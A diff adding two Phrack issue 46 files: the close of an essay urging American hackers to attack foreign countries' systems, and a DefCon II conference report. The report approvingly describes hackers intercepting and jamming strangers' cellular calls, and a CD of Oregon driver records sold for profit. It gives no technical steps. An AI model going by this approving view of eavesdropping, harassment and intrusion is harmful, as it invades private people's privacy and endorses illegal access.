+International law is so muddled that the chances of getting extradited
+by a country like France for breaking into systems in Paris from Albuquerque
+is slim at best.  Even more slim when factoring in that the information
+gained was given to the CIA and American corporations.
+
+Every hacking case involving international breakins has been tried and
+convicted based on other crimes.  Although the media may spray headlines
+like "Dutch Hackers Invade Internet" or "German Hackers Raid NASA,"
+those hackers were tried for breaking into systems within THEIR OWN
+COUNTRIES...not somewhere else.  8lgm in England got press for hacking
+world-wide, but got nailed hacking locally.  Australia's Realm Hackers:
+Phoenix, Electron & Nom hacked almost exclusively other countries, but
+use of AT&T calling cards rather than Australian Telecom got them a charge
+of defrauding the Australian government.  Dutch hacker RGB got huge press
+hacking a US military site and creating a "dquayle" account, but got
+nailed while hacking a local university.  The list goes on and on.
+
+I asked several people about the workability of my proposal.  Most
+seemed to concur that it was highly unlikely that anyone would have to
+fear any action by American law enforcement, or of extradition to
+foreign soil to face charges there.  The most likely form of retribution
+would be eradication by agents of that government.  (Can you say,
+"Hagbard?")
+
+Well, I'm willing to take that chance, but only after I get further
+information from as many different sources as I can.  I'm not looking
+for anyone to condone these actions, nor to finance them.  I'm only
+interested in any possible legal action that may interfere with my
+freedom.
+
+I'm drafting a letter that will be sent to as many different people as
+possible to gather a fully-formed opinion on the possible legal
+ramifications of such an undertaking.  The letter will be sent to the FBI,
+SS, CIA, NSA, NRO, Joint Chiefs, National Security Council, Congress,
+Armed Forces, members of local and state police forces, lawyers, professors,
+security professionals, and anyone else I can think of.  Their answers
+will help fully form my decision, and perhaps if I pass along their
+answers, will help influence other American hackers.
+
+We must take the offensive, and attack the electronic borders of other
+countries as vigorously as they attack us, if not more so.  This is
+indeed a war, and America must not lose.
+
+->Erik Bloodaxe...Hacker...American.
+
+---------------------------
+
+Ok, so maybe that was a bit much.  But any excuse to hack without fear
+should be reason enough to exert a bit of Nationalism.
+
+I'd much rather be taken out by the French in some covert operation and
+go out a martyr, than catch AIDS after being raped by the Texas
+Syndicate in the metal shop of some Federal Prison.  Wouldn't you?
diff --git a/phrack46/20.txt b/phrack46/20.txt
new file mode 100644
index 0000000..3311a08
--- /dev/null
+++ b/phrack46/20.txt
@@ -0,0 +1,912 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 20 of 28
+
+****************************************************************************
+
+                  (Cyber Christ Meets Lady Luck Continued)
+
+
+I  don't agree with everything that Gail says, but she is a  com
+pelling  speaker; she believes in what she says.  But I do  agree 
+with  her  on  the difficulty of forensic  evidence  in  computer 
+cases.
+
+"I  got  really mad," she said.  "I was reading  a  magazine  and 
+there was an ad for United, you know, the employee owned airline.  
+And it was a beautiful ad, hundred of employees standing in front 
+of  a brand new great big jet. All smiling and happy." Gail  then 
+frowned deeply.  "Some stockholder ought to sue them for mislead
+ing  advertising."  This was more like it!  Go, Gail! "I  started 
+to look at the picture carefully and I noticed this  unmistakably 
+fat lady in a pink dress.  And then over a few persons. .  .guess 
+what?  The  same fat lady in pink."  Roars of  laughter  and  ap
+plause.  
+
+Her point? What seems real may not be real at all, and with a few 
+hundred  dollars in software and a little practice,  most  anyone 
+can build a false reality digitally.  
+
+Her time was up but the audience wanted more.  She was mobbed for 
+eternity by hackers who fight her tooth and nail but respect  her 
+comportment  enough to make the disagreements  lively,  partisan, 
+entertaining, but with respect.  Respectful hackers.  No  HoHoCon 
+orgies; merely verbal barbs with no solution. Everyone knew that, 
+but it's the battle that counts.
+
+More  security  conference should be this open, this  honest  and 
+informative, with all kinds of people with all kinds of opinions.  
+That  is  how we, and I, learn.  Listen and learn.  And  all  for 
+$5000 no less, plus a paltry $15 entrance fee.
+
+			* * * * *
+
+The afternoon sessions were filled with a mixture of anti-govern
+ment,  pro-privacy  advocacy, virus workshops and  such  by  both 
+under  and above ground folks.  Padgett Peterson's  knowledge  of 
+viruses  is deep and he spread the same wisdom as his does in  so 
+called  legitimate circles.  Knowledge is knowledge,  and  better 
+accurate than wrong.
+
+It's  often  surprising  to see how people will  voice  the  same 
+opinion  in  varying  degree of intensity  depending  upon  their 
+audience.  Mark Aldrich of General Research Corp. in the Washing
+ton area made a statement that I doubt I would hear at a  ConCon. 
+"Fear  your  government  that fears your crypto.  Use  crypto  as 
+a weapon."  Sara Gordon's panel discussion on crypto  and privacy 
+and  related topics fueled the audience's general anti-fed  atti
+tude.
+
+"I  was bugged by the Feds."  "So was I?"  "What can we do  about 
+it."   "Yeah, they listen in on my phones, too.  I can  hear  the 
+clicks."  Right.
+
+As  Mark  so succinctly put it, "if the government wants  to  bug 
+you, you'll never know.  They're that good.".  That kind of  shut 
+up  the dilettante paranoids in the group, albeit  mumbling  that 
+they just knew that they were the victim of one of the 900 or  so 
+court  approved  wire taps last year.  Right.  I think Gail  was   
+right: some of you guys are too boring to be believed.
+
+The  afternoon edition of the Spot A Fed contest took us  on  the 
+run. I  actually succombed to their enthusiasm and a general lack  
+of better judgement and followed a group of 8 or 10 to unmask  an 
+unmarked white van in the parking lot. 
+
+"It's the Feds." "How do you know?"  "Oh, it's the Feds alright."  
+"How do you know."  "It's a white van and the intelligence  serv
+ices  use white vans."  "What are you going to do?"  "Bust  'em."  
+"Bust 'em for what?"  "For being Feds."  
+
+This motley crew traipsed through the mile long casino,  trodding 
+upon the ugly tartan/paisley carpets so obnoxiously loud a  blind 
+man  could  cry "Uncle!", into the Hall  of   Overpriced  Shoppes 
+through the lobby and over to the parking garage.  We had to have 
+$100,000 of surveillance gear in tow:(enough to detect the planet 
+Pluto fart in b-flat).  Radio receivers and eavesdropping  equip
+ment  were courtesy of my pal Mike Peros. The goal was,  if  this 
+was a Fed van, we could hear it.  I don't think so, but I go  for 
+the  ride and a few minutes of reprieve away from the  conference 
+hall. 
+
+As we near, the excitement grows among the more paranoid who  are 
+trying to instill their own mental foibles into their  companions 
+and  sheer terror in normal old Vegas visitors who have  no  idea 
+what they've walked into.
+
+Feds? Not. Surrepticious radio transmissions?  Just hotel securi
+ty  tracking the movements of 8 or 10 paranoids (and  one  writer 
+with  nothing else to do for a half hour) into a  parking  garage 
+which has more cameras than NBC.  Feds?  Of course not.  Don't be 
+ridiculous. 
+
+			* * * * * 
+
+To say nothing worthwhile occurred until 11PM that evening  would 
+be lying, but this thing, this DefCon II thing, was turning  into 
+what  I would have called 25 years ago, a Love-In.  The  partici
+pants were giddy from the event, the camaraderie, the $1  Heinek
+ens and the hacking.  The Sahara  was actually pretty good  about 
+it. Jeff got the conference space for free because he  guaranteed 
+that  at least 100 hotel rooms would be booked by  "computer  en
+thusiasts coming to a small computer conference."  Little did the 
+hotel  know that half the crowd was too young to drink, too broke 
+to gamble, and conspicuous enough to ward off legitimate clients.  
+But a deal's a deal.
+
+The hotel operators went out of their way and allegedly gave  the 
+hackers permission to hack through the PBX in order to provide  a 
+SLPP connection.  
+
+"Just put it back the way you found it when you're done," was the 
+hotel's only and quite reasonable request.
+
+In my day an equivalent event producing an equivalent social non-
+drug  induced high would have been achieved by tossing a  Frisbee 
+to  Grace  Slick (Lead singer Jefferson Airplane)  and  have  her 
+throw it back. We didn't have the kind of technology that today's 
+rebellious  age has.  We had the Beatles and Jimi  Hendrix,  safe 
+sex (kinda), safe drugs (well, maybe a little safer) and a cause.  
+But no technology to speak of.
+
+When  I  was on the publishing staff of the New  York  City  Free 
+Press  in  1968/9 we wrote our  anti-establishment  diatribes  by 
+hand.   By hand! And then we went down to a dark office  late  at 
+night to use their typesetting gear when it was idle.  It took no 
+more  than a blushing glance around the room to realize  that  we 
+impressionable teens were publishing our political extremisms  on 
+equipment courtesy of Al Goldstein and Screw magazine.  Now  that 
+was an education.  
+
+DefCon II was a Love-In, technology and all.  
+
+Come  11PM yet another speaker canceled so  I offered to chat  to 
+the  crowd for a half hour or so on Van Eck radiation; the  emis
+sions  from  CRT's that make video screens readable from  a  dis
+tance.   Now this wasn't a fill in at 2PM or anything.   Sessions 
+reconvened at 11PM and I spoke to a full audience who were  there 
+to get a midnight lesson in cellular hacking.
+
+Most  above ground types still believe that hacking is  an  acne-
+faced  teenager,  chigging  Jolt Cola,  wolfing  down  pepperoni 
+pizza  and causing Corporate America no end of grief.  To a  cer
+tain extent some of this is true.  But hacking is so much more.
+
+As  Rop  Gongrijjp, editor of Hacktic once told me,  "hacking  is 
+disrespect of technology."  It's going the extra mile to find out 
+how things work.  Many of the older hackers, those in their early 
+20's  and older, are migrating from the  conventional  dial-em-up 
+and  break-in hacking image to the fine art of cellular  hacking. 
+How  do these things work?  What are the frequencies? How  can  I 
+customize my phone?  How many channels can I scan?  The possibil
+ities are endless as I soon learned.
+
+Jim and Bill (fake names) asked if I wanted to see a great  demo. 
+Sure!   No  names, they said.  OK.  No problem.  In  one  of  the 
+several  thousand hotel rooms at the Sahara was a pile of  equip
+ment  to make an under budgeted  FBI surveillance  team  insanely 
+jealous. There in the middle of the ridiculously filthy room that 
+no  doubt caused the maid to shudder, sat a log periodic  antenna 
+poised  atop  a strong and highly  adjustable  photographic-style 
+tripod.   Feeding  the antenna was a hunk of coax attached  to  a 
+cell phone's antenna jack.
+
+OK, so what's that?  Free cell calls?  No, much more.
+
+A second cell phone/scanner, an Oki 900 was modified and connect
+ed to a laptop computer.  (This was the exact modification  being 
+discussed downstairs)  Custom software that was freely   distrib
+uted  around DefCon scanned the data from the Oki  and  displayed 
+the scanning activity. A pair of speakers then audibly  broadcast 
+the  specific conversation.  And in Vegas, you can  imagine  what 
+was going over the open airwaves!
+
+A  half dozen 'kids' sat around enthralled, each begging for  his 
+turn to, as Jim put it, "harass cellular users.  Pure and simple. 
+Harassment. Stomp on the son of a bitch,"  he laughed, joined  in 
+by the others. 
+
+When a 'good' conversation was detected, they entered the channel 
+into  the broadcasting cell phone and spoke.  And talk they  did. 
+Essentially  they turned 'private' conversations  into  wide-band 
+free-for-alls.  If they spoke for only a few seconds one or  both 
+of  the parties could hear what was being said.  If  they  talked 
+for  too  long, the overpowering signal from  the  antenna  would 
+literally  wipe  out the chat: the cell switch  reacted  with  an 
+internal belch and shut down. Stomping, they called it.  
+
+For  those on the receiving end of the harassment, it  must  have 
+sounded  like  the overbearing voice of God telling Noah  how  to 
+build the Ark.
+
+"Noah?"
+
+"Who dat?
+
+"Noah?"
+
+"Who is that?"
+
+What terror lurks in the minds of boys . . .
+
+For  those  old enough to remember, stomping is no more  a  stunt 
+than putting a 500 watt linear power amplifier on a CB radio  and 
+blasting nearby CB's to kingdom come.  The truckers used to do it 
+to  4-wheelers. When the police began monitoring CB channels  "to 
+protect  and  serve" they became the target of CB  stomping.   So 
+what else is new?  
+
+I gotta give it to them: these characters designed and built  the 
+software,  modified  the phones and put it all  together  and  it 
+works!   Not  bad on a $3 allowance and a 10th  grade  education.  
+Now,  I guess what they did may have been sort of illegal, or  at 
+least  highly unethical and definitely  not nice. But I  have  to 
+admit,  some of what I witnessed was very, very, funny.  I'm  not 
+advocating  this  kind of activity, but much like  Candid  Camera 
+broke  into  people's lives to capture their reactions,  cellular 
+hacking  is similarly amusing.   The hacker/phreaks  particularly 
+enjoyed breaking in on fighting couples.  (I counted six  impend
+ing divorces.) Almost without exception the man was in a car  and 
+the lady was at a fixed location; presumably, home. 
+
+Him: "Where the hell have you been."
+Her:  "Nowhere."
+Him: "Bullshit.
+Her: "Really honey . . ."  Defensively.
+Him: "Who's with you?"  Intense anger.
+Hacker: "Don't believe her.  She's a whore."
+Him: "What was that?"
+Her: "What?"
+"That voice."
+"What voice?"
+Hacker:  "Me you asshole. Can't you see she's playing you  for  a 
+fool."
+"I know she is."  He agrees.
+"What's that honey?"  
+"I know he's there with you."
+"Who?" Incredulous.
+"Him . . . whoever you're fucking when I'm at work." 
+Hacker: "Yeah, it's me."
+"Shit! Who the fuck is there?"
+"No one!"
+"I can hear him, he's there.  You're both making fun of me . . ."
+Hacker: "She's laughing at you, man."
+"No shit.  Who the fuck are you?"
+Hacker: "The guy who takes care of her when you can't, asshole."
+"That's it."  Click.
+
+Drug dealers aren't immune to these antics.
+
+"Where's the meet?"
+"By the 7/11 on Tropicana."
+"You got it?"
+"You got the cash?"
+"Yeah, dude."
+"Be sure you do."
+Hacker:  "He  doesn't have the cash my man.  He's gonna  rip  you 
+off."
+"What?"  "What?"  Both sides heard the intruder's voice.  "Who is 
+that?"
+"What's that about a rip-off?"
+"This ain't no rip-off man."
+Hacker: "Yes it is. Tell 'em the truth. You gonna take his  drugs 
+and shoot his ass. Right?  Tell 'em."
+"You gonna rip me off?"
+"No, man!"
+"Your homeboy says you gonna try and rip me off?"
+"What home boy?"
+Hacker:  "Me, you bozo drug freak. Don't you know that  shit  can 
+kill you?"
+Click.
+
+Good samaritanism pays off upon occasion.
+
+"Honey, hurry up."
+"I'm on the freeway.  I'm coming."
+Hacker: "He's late.  Let's save her ass."
+"What was that?"  "What did you say honey?"
+"He said he was going to save your ass."
+"Who did?"
+"The guy on the radio."  (Technical ignorance abounds.)
+Hacker:  "Me.  You're late and she's scared so we're  gonna  beat 
+you there and make her safe."
+"Who the hell is that?"  "Who?" "The guy with you?"  "There's  no 
+one here." "He says he's gonna beat me there and pick you up."
+Hacker: "Damn right we are."
+"Hey, this is cool.  Who's there?"
+Hacker: "Cyber Christ talking to you from Silicon Heaven."
+"No shit.  Really?"
+Hacker: "Yeah, (choke, choke,) really."
+"What's happening, honey."
+"I don't know, for sure.  He says it's God."
+"God!?!?"
+Hacker:  "Close enough.  Listen, you sound alright.  Go get  your 
+woman, man  Keep her safe."
+"No problem.  Uh, thanks."
+Click.
+
+Around 4AM, I guess it was, the hacker/phreaks definitely  helped 
+out law enforcement.  One end of the conversation was coming from 
+inside  a  hotel, maybe even the Sahara. The other  from  another 
+cell phone, most likely in the lobby. 
+
+"What do you look like?"
+"I'm  five foot nine, thinning brown hair and 180 pounds  I  wear 
+round glasses and  . ."
+"I get the idea. Where are you now?"
+"I'm coming down the elevator now.  What do you look like?"  
+"I'm  six foot one in my heels, have long blond spiked  hair  and 
+black fishnet stockings."
+Hacker: "Don't go man.  It's a bust."
+"What?" he said.
+Hacker:  "Don't go, it's a bust. You don't want your name in  the 
+papers, do ya?"
+"What the fuck?" she yelled.
+"There's a guy who says this is a bust?"
+"Bust? What bust?"
+Hacker: "That's the clue, man.  She's denying it.  Of course it's 
+a bust.  Is it worth a night in jail to not get laid?"
+"Shit."  He whispers not too quietly to another  male  companion.  
+"There's some guy on the phone who says it's bust. What should we 
+do."
+Hacker: "I'm telling you man, don't go,"
+"This ain't worth it. I'm going back upstairs."
+Click.
+
+A couple of hours later the same hooker was overheard talking  to 
+one of her work mates.
+
+"Then this asshole says it's a bust.  Cost me $300 in lost  busi
+ness, shit."
+"You,  too?   Same shit been going on all night  long.  What  the 
+fuck?"
+
+Wow.  And it seems like only this morning that my toilet  explod
+ed. 
+
+			* * * * *
+
+So  what's a perfectly groomed and slightly  rotund  50-something 
+convicted methamphetamine dealer doing at DefCon II with hundreds 
+of impressionable teenagers?  You might well ask. 
+
+So I'll tell you.
+
+Sitting in yet another Saharan hell-hole of a room they  unabash
+edly market for $55 per night I encountered hackers #1 through #4 
+and  this  . . . I immediately thought, elderly  gent.   He  said 
+nothing  and neither did I, thinking that he might have  been  an 
+over  aged  chaperone  for delinquent teens or  perhaps  even  an 
+understanding Fed.   But the gallon jugs of whiskey was depleting 
+itself right before my eyes, as if a straw from Heaven sucked the 
+manna from its innards.  Actually, it was Bootleg.
+
+Not bootleg liquor, mind you, but Bootleg the felonious con  from 
+Oregon.  Apparently he got busted 'cause speed is and was against 
+the law, and crank is not exactly the drug choice of maiden aunts 
+nor school marms.  "I've been a hacker longer than some of  these 
+kids  have been alive. It all started back in . . ."   and   Mike 
+"Bootleg" Beketic commenced on the first of hundreds of war-story 
+jail  house tales to entertain him and us.  Bootleg loves a  good 
+story.
+
+"Jail ain't so bad," he  bragged with a huge whiskey smile.   "No 
+one fucked with me.  You gotta make friends early on.  Then  it's 
+OK."  Good advice, I guess.  "On parole I got slammed with a year 
+for  piss that didn't pass."  Gotta be clean, my man.  Stay  away 
+from that shit.  It'll kill you and your teeth will rot. 
+
+Bootleg  handed  me  form PROB-37, (Rev. 1/94)  from  the  United 
+States District Court, Federal Probation System.  Grins from  ear 
+to ear.  A badge of honor for villains, thieves, and  scoundrels. 
+Sounds like they need their own union.
+
+This was the official "Permission To Travel" form dated June  16, 
+1994 which gave Bootleg the legal right to travel from Oregon  to 
+Las Vegas in the dead of the summer to attend a "computer conven
+tion."   The flight times were specific as were the conditions of 
+his  freedom.   He had to inform the local cops that  he  was  in 
+town.   In  case any crimes occurred throughout the city  of  Las 
+Vegas during his sojourn, he was an easily identifiable suspect.  
+
+While  he downed another Jack and coke I found out  what  Bootleg 
+was really doing.  Despite the fact that the "Federal Keep  Track 
+of a Crook Travel Form" said, "you are prohibited from  advertis
+ing  or  selling  your DMV  CD,"  the  paranoia that runs rampant  
+through the minds of prison bureaucracy was actually in this case  
+quite correctly concerned. 
+
+"What's a DMV CD?"
+
+"I'm glad you asked."  I was set up.  The edict said he  couldn't 
+sell  or  advertise, but there was no provision stating  that  he 
+couldn't answer questions from an inquiring mind.
+
+Bootleg handed me a CD ROM:
+
+			Bootleg Presents:
+			     DMV
+
+		- Over 2 Million Oregon Drivers License Records
+		- Over 3 Million Oregon License Plate Records
+
+The inside jacket clearly stated that this information was not to 
+be used by any creatively nefarious types for any sort of person
+al Information Warfare tactics.  It warns,
+
+Do not use this CD to:
+
+	- Make phony Licenses
+	- Make phony Titles
+	- Obtain phony I.D.
+	- Harass Politicians, Cops or Journalists
+	- Stalk Celebrities
+	- Get ME in trouble <G>
+
+I  can come up with at least 1001 other uses for this  collection 
+of  information  that the Oregon authorities are none  too  happy 
+about.   The  ones  Bootleg outlined never  came  into  my  mind.  
+(Heh!) Bootleg acquired the information legally.  State officials 
+were kind enough to violate the electronic souls of its  citizens 
+by sending Bootleg their driver's information magnetically embla
+zoned  on  a 3600 foot long piece of 9 track acetate.   Now  they 
+want  to  change the law to reflect "heart felt concern  for  the 
+privacy of their citizens."  Get a clue, or if none's  available, 
+buy one from Vanna.  
+
+Bootleg  is  moving onto the next 47 states (California  and  New 
+York don't permit this kind of shenanigans) shortly to make  sure 
+that  everyone  has equal access.  Hacking? Of  course.   Bootleg 
+effectively  hacked  the Oregon DMV with their blessing  and  tax 
+payer paid-for assistance. 
+
+Time  to  go back to my room while Bootleg and friends  spent  an 
+evening  of apparently unsuccessful whoring around the Strip  and 
+Glitter Gulch.
+
+A good time was had by all.
+
+			* * * * *
+
+Jeff  Moss  opened  the Sunday morning session  with  an  ominous 
+sermon.
+
+"You'll  notice that the wet bar is missing from the  rear?"   It 
+had  been  there yesterday.  Everyone turns around to  look.   "I 
+gotta  pay for the damage . . . "  Jeff was not a  happy  camper.  
+"They  have my credit card number and it's almost full.  So  cool 
+it!" But the show must go on and we had more to learn.
+
+Next.   Anonymous mailers on the net?  Forget about it.  No  such 
+thing. Anonymous remailers, even if they are in Norway or Finland 
+or some such other country where American information  contraband 
+such  as child pornography is legal, are only as safe and  secure 
+as the people who run it
+
+"The  FBI can go over any time they want and look up who you  are 
+and  what kinds of stuff you swallow down your  digital  throat," 
+one  speaker  announced.  Of course that's ridiculous.   The  FBI 
+would  have to call in the Boy Scouts or Russian Mafia  for  that 
+kind of operation, but we all knew that anyway.  A slight slip of 
+the ad lib tongue.  No harm done.  
+
+I  didn't know, until this Sunday, that there were actually  real 
+live versions of "Pump Up The Volume" running rampant across  the 
+country,  impinging their commercial-free low power radio  broad
+casts into an electromagnetic spectrum owned and operated by  the 
+Federal  Communications Commission.  And, as to be expected,  the 
+FCC  is trying to put these relatively harmless stations  out  of 
+business  along with Howard Stern and Don Imus.  One would  think 
+that WABC or KLAC or any other major market stations would little 
+care  if a podunk 20 watt radio station was squeezing in  between 
+assigned  frequencies.  And they probably shouldn't.  But, as  we 
+learned, the Military lent an innocent hand.  
+
+In  support of the hobbies of servicemen, a local  San  Francisco 
+base commander gave approval for a group of soldiers to establish 
+a small, low power radio station for the base.  Good for  morale, 
+keep the men out of the bars: you know the bit.
+
+But  the  ballistic missiles went off when the  nation's  premier 
+rating service, Arbitron, listed KFREE as a top local station  in 
+the San Francisco market.
+
+"What station KFREE?"  "Who the hell are they?"  "What the fuck?"
+
+Needless to say, KFREE was costing the legitimate radio  stations 
+money  because  advertising rates are based upon  the  number  of 
+listeners not up and peeing during commercials.  Since KFREE  was 
+ad-free,  no contest.  Arbitron assumes the rating to relect  the 
+existence  of  a real station - the numbers are there -  and  the 
+local  stations  call the FCC and the FCC calls the base  and  as 
+quick as you can scream, "Feds suck!" KFREE is off the air.  
+
+Stomp.
+
+I  was scheduled to speak today, but with the schedule  seemingly 
+slipping  forward  and backward at  random  haphazard  intervals, 
+there  was  no telling when what would occur.  Mark  Ludwig,  of   
+Virus Writing Contest fame and author of the much touted  "Little 
+Black  Book  of Computer Viruses" Virus gave a less  then  impas
+sioned speech about the evils of government.
+
+"I know most of you don't have any assets other than your comput
+er,"  Ludwig  said to the poverty stricken masses of  DefCon  II.  
+"But  you will, and you want to make sure the government  doesn't 
+come  crashing down around you whenever they want.  They can  and 
+will  take your life away if it suits them.  There is  no  fourth 
+amendment.   Most  search and seizures are illegal."  And  so  it 
+went. 
+
+"Put your money off shore, kids," said Dr. Ludwig the theoretical 
+physicist.   "Find a good friendly country with flexible  banking 
+laws and the Feds can't get you."
+
+"And  when the Feds do come for you, make sure that  your  entire 
+life is on your computer.  Rip up the papers after you scan  them 
+in.   Your all-electronic life cannot be penetrated -  especially 
+if  you get a case of the forgets.  'Oops, I forgot my  password. 
+Oops! I forgot my encryption key.  Oops! I forgot my name.'"
+
+"Even your VISA and Mastercard accounts should be from  overseas.  
+Keep it out of the US and you'll be all the better for it."   For 
+those interested in such alternative, Ludwig recommends that  you 
+call  Mark Nestman: of LPP Ltd. at 800-528-0559 or  702-885-2509.  
+Tell  him you want to move your millions of rubbles  and  dollars 
+and Cyber-credits overseas for safe keeping because the Byzantine 
+Police are at the front door as you speak.  Order pamphlet 103.
+ 
+These  are the defensive measures we can take  protect  ourselves 
+against the emerging Police State.  But offensive action is  also 
+called  for, he says.  "Help Phil Zimmerman.  Send him money  for 
+his  defense.   Then, laugh at the Feds!"  Haha, haha.   Haha.  
+Hahahahahaha.  Ha!
+
+."When they come to the door, just laugh at them."  Haha.   Haha
+ha.  Haha.  "No matter what they do, laugh at them."  Hahahahaha.   
+Enough  of  that,  please.  If I laugh at  6  husky  beer-bellied 
+Cyber-cops  who have an arsenal of  handguns pointed at my  head, 
+they  might as well send me to the Group W bench  to  commiserate 
+with  Arlo Guthrie.  Peeing would come before laughing. But  then 
+again,  I'm no longer a grunged out 20 year old who can laugh  in 
+the face of  the Grim Reaper.  "Yes, ossifer, sir.  I'm a  cyber-
+crook.  I ain't laughing at you in your face, ossifer, sir . . ."  
+I panic easily.  Kissing ass well comes from a life long  success 
+of quid pro quo'ing my way from situation to situation. 
+
+"And, now," Master Mark announced, "on to the results and  awards 
+for  the Annual Virus Writing contest."  Ludwig  seemed  suddenly 
+depressed.   "Unfortunately, we only got one  legitimate  entry."  
+One  entry?   The media plastered his contest across  the  media-
+waves and the National Computer Security Association was planning 
+a  tactical nuclear response.  One entry?  What kind  of  subver
+sives have 20 year olds turned into anyway?  In my day (Yeah, I'm 
+old  enough  to use that phrase) if we called for  a    political  
+demonstration thousands would pile through the subway  turnstiles 
+to  meet a phalanx of well armed police appropriately attired  in 
+riot  gear.  One entry?  Come on X-Generation, you can do  better 
+than  that?   No wonder the world's going to  shit.   Don't  have 
+enough trouble from the young-uns.   Sheeeeeeesssh!
+
+Mark  Ludwig's  politically incorrect virus writing  contest  may 
+have  been  a  PR success but it was a  business  abortion.   One 
+entry.  Shit.  At the NCSA meeting in Washington,  rivaling  fac
+tions battled over how we as an association should respond.  
+
+"Hang the bastard."  "He's what's wrong with world."  "Put him in 
+a county jail with Billy-Bob, Jimmy-Ray and Bubba for a week  and 
+they'll be able to squeeze him out between the bars."
+
+C'mon  you fools! Ignore him! Ignore him! If you don't like  what 
+he has to say don't egg him on. Ignore him.  You want to do  what 
+the  Feds  did to poor Phil Zimmerman and make him a  folk  hero?  
+Turning a non-event into the lead for the evening news is not the 
+way  to  make something go away. I loudly advocated  that  he  be 
+treated  as a non-entity if the goal was reduction to  obscurity.   
+I was right.  
+
+Super-high priced PR and lobby firms had prepared presentation to 
+wage an all-out attack on Ludwig and his contest.  I bet! And who 
+was going to pay for this?  Peter Tippitt of Semantech ponied  up 
+what  I believe amounted to $7,000 to get the pot going.  No  one 
+else made a firm offer. Can't blame them cause it would have been 
+no  more effective than taking out an ad in Time proclaiming that 
+evil  is bad.  The PR firm would have made their fees, the  event 
+would  have made even more news and Ludwig  would certainly  have 
+had to make a judgement and choose from more than one entry.
+
+But oddly enough, the one entry did not win.
+
+The  winner of the Annual Virus Writing Contest was no less  than 
+Bob Bales, Executive Director of the NCSA.  Not that Bob wrote  a 
+program, but if  he had, Ludwig  said, it  would be called either 
+Don Quixote  or Paranoia, and it would be  of the human brain at- 
+tacking Meme type.  The  virus is a software equivalent of Prozac 
+to  alleviate  the  suffering  in  middle-aged males  who have no 
+purpose in life  other than virus busting.  
+
+"Is Winn Schwartau here?" Mark asked the audience.  
+
+I was there. "Yo!"  
+
+"Would you tell Bob that he's won a plaque, and a $100 check  and 
+a  full  year  subscription to the  Computer  Virus  Developments 
+Quarterly."   I'm  the technology advisor to the NCSA so  it  was 
+a natural request to which I was pleased to oblige.
+
+I  told  Bob about his 15 minutes of fame at DefCon to  which  he 
+roared  in laughter.  "Good! Then I won't have to  subscribe  my
+self."
+
+
+
+I  spoke  next.   Jeff introduced me by  saying,  "Winn  says  he 
+doesn't  want to speak to an empty room so he's gonna talk  now."  
+Some introduction. But, what a great audience!  Better than  most 
+of  the security above-ground starched sphincter tight  suit  and 
+tie  conference audiences I normally get.  But then again, I  get 
+paid  handsomely to address legitimate audiences where I have  to 
+be politically correct.  At DefCon, insulting people was the last 
+thing  I  worried about.  It was what I focused on,  onstage  and 
+off.
+
+"Hey, kid.  Did you ever land Zimmerman in bed?"  
+
+"You, you, er . . ."  
+
+"C'mon kid. Give me your best shot."
+
+"Your mother . . ."  A crowd gathered to see what kind of  repar
+tee  this little schnook could come up with.  "Your mother ..  ."  
+C'mon  kid.  You  got it in you. C'mon.  "You, she is a   .  .  . 
+uh,  .  . . mother . . ." and he finally skulked  away  in  sheer 
+embarrassment.   Poor kid.  When he went to the men's  room,  men 
+walked out.  Poor kid.  I don't think he ever figured out it  was 
+all a put on.
+
+The audience got it, though.  Rather than go over what I  rambled 
+about for an hour, here comes a blatant plug: Go buy my new  book 
+"Information  Warfare:  Chaos on  the  Electronic  Superhighway."  
+That'll sum it up real nice and neat.  But what a great audience. 
+Thanks.
+
+Little did I know, though, that I was also on trial.
+
+John Markoff of the New York Times was the first to ask, and then 
+a  couple of buddies asked and then a lady asked during  the  Q&A 
+portion of my ad hoc ad lib speech.  "How come you did it?"   Did 
+what?  "How come you flamed Lenny DeCicco?"  
+
+It  turns  out that someone adapted my  electronic  identity  and 
+logged  on to the WELL in Sausalito, CA and proceeded to  post  a 
+deep  flame  against Lenny.  Among other  none-too-subtle  asper
+sions, 'my' posting accused Lenny of a whole string of crimes  of 
+Information Warfare and even out and out theft. 
+
+Except,  it wasn't me.  I answered the lady's question with,  "It 
+wasn't me, I don't know Lenny and I don't have an account on  the 
+WELL."    That satisfied everyone except for me.   What  happened 
+and  why?   It seems that Lenny's former partner in  crime  Most-
+Wanted on the lam federal fugitive computer hacker Kevin  Mitnick 
+actually  wrote  and  signed the letter with  his  initials.   Or 
+someone  was spoofing him and me at the same time.  But why?  And 
+why me?
+
+It took a couple of days after arriving home from DefCon to learn 
+after  extensive conversations with the WELL that my  erased  ac
+count from almost two years ago and then re-erased on June 20  of 
+this  year  was accidentally turned back on  by  some  mysterious 
+administrative process that I cannot claim to fathom.  OK, that's 
+what they said.  
+
+But perhaps most interesting of the entire Getting Spoofed  inci
+dent  was a single comment that Pei Chen, sysop of the WELL  said 
+to  me  while I complained about how such  an  awful  anti-social 
+attack was clearly reprehensible.  Oh, it's simple, she said.
+
+"We  have no security."  Whooaaaahhh!  The WELL? No security?   I 
+love  it.   I  absolutely love it.  Major  service  provider,  no 
+security.  Go get 'em cowboy.
+
+The  only  other speaker I wanted to see was Peter  Beruk,  chief 
+litigator for the Software Publisher's Association.  This is  the 
+Big  Software  Company sponsored organization which  attempts  to 
+privately  interdict illegal software distribution as  a  prelude 
+for both civil and criminal prosecutions.  And with this group of 
+digital anarchists, no less.
+
+The  SPA scrounges around 1600 private BBS's to see who's  making 
+illicit  copies  of   Microsoft Word or Quattro  For  Weanies  or 
+Bulgarian  for Bimbos or other legitimate software that the  pub
+lishers  would  rather receive their due income from  then  being 
+stolen.
+
+"Which boards are you on?"
+
+"That would be telling."  Big grin and laughs.
+
+"Is your BBS secure?"  A challenge in the making.
+
+"Sure is."
+
+"Is that an offer to see if we can break in?"  Challenge made.
+
+"Ahem, cough, cough." Challenge denied.
+
+"What  name do you use on the boards?"  Idiot question  that  de
+serves an idiot answer.
+
+"Fred."  Laughs.
+
+"You  mean  you have a full time guy to  download  software  from 
+boards to see if it's legal or not?"  "Yup."
+
+"So,  you pay people to commit felonies?"  Astutely stupid  ques
+tion.
+
+"We have permission."
+
+"Why should we have to pay rip-off corporations too much money to 
+use really shitty software?"
+
+"So don't buy it."
+
+"We don't.  It's so shitty that it's barely worth stealing."
+
+"So don't steal it."
+
+"Just want to check it out, dude."
+
+"Scum  sucking  imperialists are making all of  the  money.   The 
+software  designers  are getting ripped off by the  big  software 
+bureaucracies.   Power  to the people."   Every  generation  goes 
+through this naively innocent berating of capitalism.  It doesn't 
